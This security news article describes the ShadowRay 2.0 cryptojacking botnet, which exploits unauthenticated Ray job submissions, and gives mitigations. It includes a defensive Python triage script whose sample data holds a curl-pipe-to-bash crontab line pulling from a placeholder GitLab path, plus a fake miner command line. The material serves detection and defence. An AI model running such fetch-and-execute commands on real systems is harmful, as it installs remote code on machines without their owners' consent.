- A longstanding security flaw in the Ray AI framework is being exploited to create self-replicating cryptocurrency mining botnets.
- The ShadowRay 2.0 campaign targets exposed Ray clusters with NVIDIA GPUs using unauthenticated job submissions.
- Attackers use infected clusters for cryptojacking and denial-of-service (DDoS) attacks, enhancing their capabilities beyond mining.
- More than 230,500 Ray servers are publicly accessible, posing widespread risk due to inadequate network isolation.
- Mitigation includes using tools like the Anyscale “Ray Open Ports Checker” and restricting dashboard access with firewalls and authentication.
Oligo Security has issued a warning about an ongoing global attack campaign exploiting a two-year-old vulnerability in the Ray open-source Artificial Intelligence (AI) framework. The exploit allows threat actors to hijack clusters equipped with NVIDIA GPUs, turning them into a self-propagating cryptocurrency mining botnet dubbed ShadowRay 2.0. This campaign is a continuation of activity observed from September 2023 to March 2024 and has likely been active since September 2024.
The critical flaw, identified as CVE-2023-48022 with a CVSS score of 9.8, stems from missing authentication in the Ray Job Submission API at the endpoint “/api/jobs/”. Attackers submit malicious jobs containing Bash and Python payloads to exposed dashboards, gaining control over the clusters. The vulnerability remains unpatched due to a “long-standing design decision” by the developers to run Ray in isolated environments and trust submitted code, as detailed in an update by Anyscale.
Infected clusters become part of a worm capable of spreading the malware autonomously by distributing payloads to other vulnerable Ray servers. The malware uses the platform’s orchestration abilities to move laterally to nodes not visible on the internet, maintain remote access through reverse shells, and persist by executing a cron job every 15 minutes that fetches updated malware versions from GitLab repositories.
The campaign employs GitHub and GitLab for hosting malicious payloads under accounts like “ironern440-group” and “thisisforwork440-ops,” both of which have been removed following takedown requests. However, attackers quickly recreated accounts, signaling ongoing persistence. The malicious code shows signs of leveraging large language models (LLMs) to generate the payloads, based on its structure and comments.
The infection mechanism includes a region check that excludes targets in China, deploying its malware only on hosts outside that area. The malware also eliminates competing cryptocurrency miners on infected hosts to maximize resource use. Additionally, processes are disguised as legitimate Linux kernel workers, and CPU use is capped around 60% to avoid detection.
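Two of the host-level persistence traits described above (a cron job firing every 15 minutes that pulls code from GitLab/GitHub, and user-space processes named like kernel workers) can be checked with a short triage script. The following is an added example written for this article, not code from Oligo or Anyscale; the crontab lines and process table are constructed sample data, and the kernel-worker heuristic (real kernel threads have an empty /proc/PID/cmdline and no /proc/PID/exe link) is an assumption about how the disguise would present, since the article does not detail it.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab (not taken from the article): one benign nightly
# job, one 15-minute fetch-and-execute from a placeholder GitLab path, and
# one 15-minute local health check that should NOT be flagged.
CRONTAB = """\
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/15 * * * * curl -fsSL https://gitlab.com/PLACEHOLDER-ACCOUNT/raw/main/x.sh | bash
*/15 * * * * /opt/ray/bin/healthcheck.sh
"""

@dataclass
class Proc:
    pid: int
    comm: str      # process name as shown by ps / /proc/<pid>/comm
    cmdline: str   # /proc/<pid>/cmdline; empty for genuine kernel threads
    exe: str       # readlink /proc/<pid>/exe; empty for genuine kernel threads

# Constructed process table: a real kernel thread, a user-space binary hiding
# under a kworker name (assumed presentation), and an ordinary Ray process.
PROCS = [
    Proc(12, "kworker/0:1", "", ""),
    Proc(4711, "kworker/u8:3", "/tmp/.x/kworker -o stratum+tcp://pool.example:3333",
         "/tmp/.x/kworker"),
    Proc(900, "raylet", "/opt/ray/bin/raylet --port 8265", "/opt/ray/bin/raylet"),
]

# Matches the "every 15 minutes" schedule and captures the command part.
CRON_15MIN = re.compile(r"^\*/15\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>.+)$")
# Matches a downloader pulling from the code-hosting services named in the report.
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*https?://(gitlab|github)\.com/", re.I)

def suspicious_cron_entries(crontab: str) -> list:
    """Return 15-minute cron entries that fetch content from GitLab or GitHub."""
    hits = []
    for line in crontab.splitlines():
        m = CRON_15MIN.match(line.strip())
        if m and REMOTE_FETCH.search(m.group("cmd")):
            hits.append(line.strip())
    return hits

def fake_kernel_workers(procs) -> list:
    """Heuristic: a kworker-named process that has a cmdline or an exe link
    is a user-space program masquerading as a kernel thread."""
    return [p for p in procs if p.comm.startswith("kworker") and (p.cmdline or p.exe)]

if __name__ == "__main__":
    for entry in suspicious_cron_entries(CRONTAB):
        print("suspicious cron entry:", entry)
    for p in fake_kernel_workers(PROCS):
        print(f"masquerading kworker pid={p.pid} exe={p.exe}")
```

On a live host the same functions can be fed the output of `crontab -l` (per user) and a walk of /proc, reading comm, cmdline and the exe symlink for each PID.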
Despite recommendations for Ray to operate in controlled networks, over 230,500 Ray servers remain exposed online. These are detectable using tools such as the open-source vulnerability scanner interact.sh.
Anyscale has responded by releasing a “Ray Open Ports Checker” utility to verify cluster configurations and prevent accidental exposure. Recommended defenses include restricting network access via firewall rules and implementing authentication for the Ray Dashboard port (default TCP 8265).
In addition to cryptojacking, compromised clusters have been used in denial-of-service (DDoS) attacks using tools like sockstress. These attacks target competitor mining pools and other infrastructure by flooding port 3333, commonly associated with mining services, indicating diversified monetization strategies by threat actors.
“The attackers have turned Ray’s legitimate orchestration features into tools for a self-propagating, global cryptojacking operation, spreading autonomously across exposed Ray clusters,” said researchers Avi Lumelsky and Gal Elbaz, highlighting the dangerous evolution of this campaign.
